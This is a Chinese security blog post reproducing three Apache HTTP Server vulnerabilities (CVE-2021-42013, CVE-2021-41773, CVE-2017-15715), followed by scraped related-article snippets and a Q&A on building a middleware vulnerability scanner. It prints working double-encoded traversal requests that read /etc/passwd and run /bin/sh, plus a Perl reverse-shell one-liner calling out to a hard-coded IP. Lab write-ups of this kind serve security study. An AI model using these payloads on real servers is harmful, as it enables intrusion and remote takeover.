Apache-RCE、目录遍历漏洞、文件解析

已于 2023-12-24 08:26:52 修改
阅读量1.7k 收藏 22
点赞数 25
文章标签: 安全 web安全 网络 java 网络安全
于 2023-12-21 17:18:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_68408599/article/details/135134798
版权
文章讲述了ApacheHTTPServer的两个安全漏洞:CVE-2021-42013允许远程代码执行,通过二次URL编码绕过检测;CVE-2021-41773是路径穿越漏洞,可用于文件读取和潜在命令执行。详述了漏洞原理、POC示例和攻击利用方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

8cbb9842a42a4722058e93ed80b98fd5.png

1、CVE-2021-42013(RCE)

介绍:

Apache HTTP Server 是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的 API 进行扩充的特点,发现 Apache HTTPServer 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。

 影响版本:Apache2.4.49 和 Apache 2.4.50,而不影响更早版本。

1.1.poc信息

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

构造这个路径原因如下:

首先看到有".%%32%65"这个字符串,字符串进行url解码一次后得到".%2e",再进行解码一次后得到"..",因此实际路径为"/cgi-bin/../../../../bin/bh",

这里先讲讲CVE-2021-41773原因:

Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在"../"的路径穿越符。但是奇怪就奇怪在"%2e./"能检测出来,但是".%2e/"不行,通过查找资料可知,在进行验证时,开发者只考虑了"."后面有没有"/",并没有考虑" "所以造成了该漏洞。

而CVE-2021-42013是修复了对".%2e/"的检测,但是在处理外部HTTP请求时,会调用 ap_process_request_internal函数对url路径进行处理,在该函数中,首先会调用ap_normalize_path函数进行一次url解码,之后会调用ap_unescape_url函数进行二次解码。因而二次url编码即可绕过检测。

echo;perl -e 'use 
Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,ge
tprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/b
in/sh -i");};'

 1.2.攻击利用

efca519babc6427c889899e5cb57fe7a.png

2、CVE-2021-41773(路径穿越)

 介绍:

Apache HTTP Server 2.4.49、2.4.50 版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到 Web 目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

2.1.poc信息

/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

2.2.攻击利用

fa4c6a3d89a140aaaf3aed628dfdb0a7.png

注意:必须在burpsuit进行Get传参,这样就不会被浏览器解析它的url编码更改后面的文件就能造成任意文件读取。

3、CVE-2017-15715(文件解析)

介绍:

Apache HTTPD 是一款 HTTP 服务器。其 2.4.0~2.4.29 版本存在一个解析漏洞,在解

析 PHP 时,1.php\x0A 将被按照 PHP 后缀进行解析,导致绕过一些服务器的安全策

略。

71da32e4b71c4d18836b5fbedd4a21a0.png

 

 

 

 

 

Apache Flink 目录遍历
平凡
05-05 368
​我举手向苍穹,并非一定要摘星取月,我只是需要这个向上的、永不臣服的姿态。
Apache目录遍历漏洞
willow_liang的博客
10-21 2281
实验环境: win2003+phpstudy2014 1.目录遍历目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一-安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web目录以外的文件),甚至执行系统命令。程序在实现.上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。 1 漏洞复现 漏洞原理: 2 漏洞修复: ` Options -Index
Apache目录遍历(CVE-2021-41773)
weixin_42299610的博客
06-07 538
Apache目录遍历(CVE-2021-41773)
Apache Tomcat RCE漏洞(CVE-2025-24813)
最新发布
2302_80982453的博客
03-25 601
漏洞在于 Tomcat 在处理不完整PUT请求上传时,会使用了一个基于用户提供的文件名和路径生成的临时文件。3,应用程序使用 Tomcat 的基于文件的会话持久化(默认存储位置)2,当存在反序列化利用链时,可以上传包含恶意序列化数据的文件。1,默认 Servlet 启用了写权限(默认禁用)4,应用程序包含可被利用于反序列化攻击的库。2,启用了部分PUT请求支持(默认启用)
Apache文件下载和目录遍历漏洞
weixin_51339377的博客
04-08 1415
文件下载漏洞+目录遍历漏洞安全文件下载概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全文件下载漏洞。 此时如果 攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如../../../e
Apache Struts2目录遍历漏洞(S2-004)
weixin_47493074的博客
09-27 715
Apache Struts2目录遍历漏洞(S2-004)
目录遍历漏洞
qq_68163788的博客
05-22 4006
目录遍历漏洞(Directory Traversal Vulnerability),也称为路径遍历漏洞,是指攻击者可以在没有得到授权的情况下,访问服务器上的敏感文件目录,甚至可以直接获取服务器的控制权。 目录遍历漏洞的原理是利用Web应用程序中对用户输入数据的不完全过滤和验证,攻击者可以构造特定的URL请求,通过在URL中添加../等符号,来访问系统中的其他目录文件。例如,攻击者可以通过以下URL访问系统中的敏感文件:http://www.example.com/index.php?page=../
apache目录遍历漏洞利用_目录遍历漏洞简述_SegmentFault 行业快讯 - SegmentFault 思否...
weixin_34331744的博客
01-14 367
渗透人员可通过目录遍历攻击获取服务器的配置文件等等资料。一般的说,它调用服务器的标准API、使用的是文件的标准权限。所以它攻击的不是什么漏洞,而是网站设计人员的思想“缺陷”。常见的目录遍历攻击,访问“../”这类的上级文件夹的文件。“../”和转译攻击在2000年前后就存在了,只是那时候的攻击直接在URL里放字符串就ok了。今天的目录遍历攻击进化了很多。那么请允许我犯懒,摘取Wiki的几个例子:$...
通过CVE-2021-43297漏洞Apache Dubbo<=2.7.13下实现RCE
「 虚幻私塾」
01-21 1820
Python微信订餐小程序课程视频 https://edu.youkuaiyun.com/course/detail/36074 Python实战量化交易理财系统 https://edu.youkuaiyun.com/course/detail/35475 目录* 0 前言 1 找源头 1.1 找到触发点 1.2 可用的gadget 1.3 向上推触发点 2 构造poc 2.1 开启HttpServer 2.2 hessian2序列化过程简述 3 poc 4 总结 5 Dubbo<=2.7.13可用的POC
常见框架漏洞 中(IIS6.x、IIS7.x、Apache、Nginx)
2301_76631050的博客
08-07 1369
目录中间件IISIIS6.x篇PUT漏洞漏洞描述环境漏洞复现漏洞复现工具连接IIS6.0解析漏洞IIS短文件漏洞漏洞描述原理复现短⽂件名特征:⼯具IIS RCE-CVE-2017-7269简介影响范围复现利⽤⼯具反弹shellApache未知扩展名解析漏洞AddHandler导致的解析漏洞目录遍历漏洞原理复现Apache HTTPD 换行解析漏洞(CVE-2017-15715)Nginx文件解析漏洞目录遍历漏洞描述原理漏洞复现CRLF注⼊漏洞复现文件名逻辑漏洞(CVE-2013-4547)描述环境漏洞复现中
Apache Tomcat 任意文件读取漏洞复现与分析
糖小喵
06-04 3027
漏洞原因: 由于Tomcat对ajp传递过来的数据的处理存在问题,导致我们可以控制“javax.servlet.include.request_uri”,“javax.servlet.include.path_info”,“javax.servlet.include.servlet_path”,这三个参数,从而读取任意文件漏洞环境: Tomcat 8.0.50版本搭建, http://archive.apache.org/dist/tomcat/tomcat-8/v8.0.50/ 下载对应的T
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 2259
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
#渗透测试#批量漏洞挖掘#飞企互联-FE企业运营管理平台 uploadAttachmentServlet—文件上传漏洞(CNVD-2023-12567)
soc的博客
02-24 726
企互联-FE企业运营管理平台是一个利用云计算、人工智能、大数据、物联网和移动互联网等现代技术构建的云工作台。然而,该平台的uploadAttachmentServlet接口存在文件上传漏洞,这使得恶意攻击者有可能上传有害的后门程序或木马。这种攻击可能使得攻击者获得对服务器的远程访问权限,或者对系统造成破坏,给服务器带来严重的安全威胁。
apache目录遍历漏洞利用_Apache Flink 目录遍历漏洞(CVE-2020-17518)WINDOWS 环境复现
weixin_42300090的博客
02-15 617
Apache Flink目录遍历漏洞复现(CVE-2020-17518)1.漏洞复现1.1漏洞背景Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。近日 Apache官网发布了Apache Flink目录遍历漏洞(...
CVE-2021-42013:Apache HTTP Server目录遍历漏洞
weixin_47179815的博客
07-13 3050
漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。Apache HTTP Server 2.4.50 Apache HTTP Server 2.4.49查询地址:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202
apache目录遍历漏洞利用_漏洞Apache Flink 目录遍历漏洞威胁通告
weixin_33369196的博客
01-09 402
2021年1月6日,必达实验室天问安全团队依托监测平台发现Apache披露了Apache Flink 目录遍历漏洞(CVE-2020-17518、CVE-2020-17519)。经分析,远程攻击者可利用该漏洞在目标服务器上写入、读取任意文件。天问安全团队初步研判,该漏洞影响范围广泛,并提醒用户及时采取消控措施。1. 漏洞分析1.1 漏洞信息概要注:漏洞类型与危害等级参考[信息安全技术安...
Apache Flink jobmanager 目录遍历漏洞
weixin_46801402的博客
11-02 625
Apache Flink jobmanager 目录遍历漏洞
apache目录遍历漏洞利用_Apache Flink目录遍历漏洞(CVE202017518/CVE202017519)
weixin_28419039的博客
01-09 353
漏洞概述2021年1月5日,Apache官网通报了Apache Flink目录遍历漏洞,可通过REST API读/写远程文件。CVE-2020-17518:构造恶意http header,可实现远程文件写入。Flink1.5.1引入了一个REST处理程序,允许您编写文件到本地文件系统上的任意位置。CVE-2020-17519:通过REST API使用../跳目录实现系统任意文件读取。Ap...
怎么把中间件漏洞集成在一个系统上
03-09
<think>好的,用户想要了解如何将中间件漏洞检测或管理系统集成到一个系统中。我需要先理解中间件漏洞管理的基本流程,然后考虑系统集成的方法。 首先,中间件漏洞管理通常包括漏洞扫描、修复验证、持续监控这几个步骤。用户可能希望将这些步骤自动化,并集成到一个统一的平台里。根据引用中的例子,比如Weblogic的漏洞修复需要修改组件或配置文件,这可能涉及到配置管理的问题。 接下来,系统集成需要考虑模块化设计。可能需要漏洞扫描引擎,比如集成现有的工具如Nessus或OpenVAS,或者开发自定义扫描器。然后,配置管理模块需要能自动识别中间件的配置,比如引用提到的httpd.conf中的配置修改,系统需要能自动检测这些配置是否符合安全标准。 自动化修复方面,用户可能希望系统能自动应用修复措施,比如替换有漏洞的组件或修改配置文件。但需要注意自动化修复的风险,可能需要人工审核。持续监控模块需要实时监控中间件的状态,结合威胁情报及时更新漏洞库,如MS15-034这样的漏洞需要及时识别。 集成到现有系统中,可能需要通过API或Webhook与已有的运维平台对接,比如Jenkins或Kubernetes。权限管理也很重要,确保系统有足够的权限执行扫描和修复,但又要避免权限过高带来的风险。日志和审计功能可以记录所有操作,方便追踪和合规。 在技术选型方面,可能需要使用Python或Go来开发系统,利用现有框架如Django或Flask。数据库方面,MySQL或MongoDB适合存储漏洞数据。部署时,Docker容器化可以方便扩展,Kubernetes适合集群管理。 不过,用户可能没有提到的需求包括如何处理误报,如何平衡自动修复和系统稳定性,以及如何更新漏洞特征库。此外,权限提升可能带来的安全问题也需要考虑,比如密钥管理。最后,系统的可扩展性,是否支持不同的中间件类型,比如Weblogic、Apache、IIS等,这些都是需要考虑的因素。 总结下来,集成系统需要模块化设计,自动化流程,与现有工具链的整合,以及安全可靠的权限和日志管理。同时,需要考虑实际部署中的技术选型和潜在挑战,比如误报处理和更新机制。</think>### 如何将中间件漏洞检测与管理系统集成? #### 一、核心流程设计 1. **漏洞扫描引擎集成** - 通过调用开源工具(如Nessus、OpenVAS)或自研扫描器,实现中间件配置与版本检测。 - 示例:检测WebLogic的`uddiexplorer.war`组件是否存在[^1],或Apache的`httpd.conf`中`Options`参数是否包含`+Indexes`[^2]。 - 技术实现: ```python import subprocess def scan_middleware(target_url): # 调用Nessus API或自定义脚本 result = subprocess.run(["nessuscli", "scan", target_url], capture_output=True) return parse_vulnerabilities(result.stdout) ``` 2. **配置管理模块** - 自动解析中间件配置文件(如`httpd.conf`、`weblogic.xml`),识别高风险配置。 - 示例:自动将`Options +Indexes`修改为`Options -Indexes`[^2]。 3. **自动化修复与验证** - 根据漏洞类型执行修复操作(如组件替换、配置更新),并通过回归测试验证修复效果。 - 示例:修复WebLogic漏洞时,移除`uddiexplorer.war`或限制其访问权限[^1]。 #### 二、系统架构集成 1. **模块化设计** ```plaintext +-------------------+ +-------------------+ +-------------------+ | 漏洞扫描引擎 | --> | 配置管理模块 | --> | 自动化修复模块 | +-------------------+ +-------------------+ +-------------------+ ↓ ↓ ↓ +-------------------+ +-------------------+ +-------------------+ | 持续监控与告警 | <-- | 日志与审计系统 | <-- | 权限管理模块 | +-------------------+ +-------------------+ +-------------------+ ``` 2. **API与现有系统对接** - 通过REST API与DevOps工具链(如Jenkins、Kubernetes)集成,实现漏洞修复流程自动化。 - 示例:在CI/CD流水线中加入中间件扫描步骤。 3. **权限与安全控制** - 采用最小权限原则,限制系统对生产环境的修改权限。 - 关键操作需二次确认(如自动修复前发送审批请求)。 #### 三、关键技术实现 1. **漏洞特征库构建** - 整合CVE、CNVD等公开漏洞库,结合自定义规则(如正则表达式匹配配置错误)。 - 示例规则: ```regex Options\s+\+Indexes # 检测Apache目录遍历风险 ``` 2. **实时监控与告警** - 通过日志分析(如ELK栈)或Agent探针,实时监控中间件状态。 - 发现异常行为(如未经授权的`SearchPublicRegistries.jsp`访问)时触发告警。 3. **修复策略模板化** - 为常见漏洞预定义修复方案: ```yaml - name: weblogic_ssrf action: type: "component_removal" target: "/u01/app/weblogic/uddiexplorer.war" backup: true ``` #### 四、部署与运维 1. **容器化部署** - 使用Docker封装扫描引擎与管理系统,通过Kubernetes实现弹性扩展。 - 示例部署文件: ```dockerfile FROM python:3.9 COPY vulnerability_scanner.py /app/ RUN pip install requests nessus-rest CMD ["python", "/app/vulnerability_scanner.py"] ``` 2. **灰度发布与回滚** - 先对测试环境应用修复策略,验证通过后再同步到生产环境。 - 保留修复前的快照(如VM镜像、配置备份),支持一键回滚。 #### 五、挑战与解决方案 1. **误报率控制** - 通过机器学习模型(如基于历史数据的决策树)优化漏洞判定逻辑。 - 人工审核高风险漏洞(如SSRF、RCE)。 2. **兼容性问题** - 为不同中间件(WebLogic、Apache、Nginx)开发适配器,抽象统一接口。 - 示例兼容性测试矩阵: | 中间件类型 | 配置文件解析 | 自动修复支持 | |------------|--------------|--------------| | WebLogic | ✔️ | ✔️ | | Apache | ✔️ | ✔️ | --- ###
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值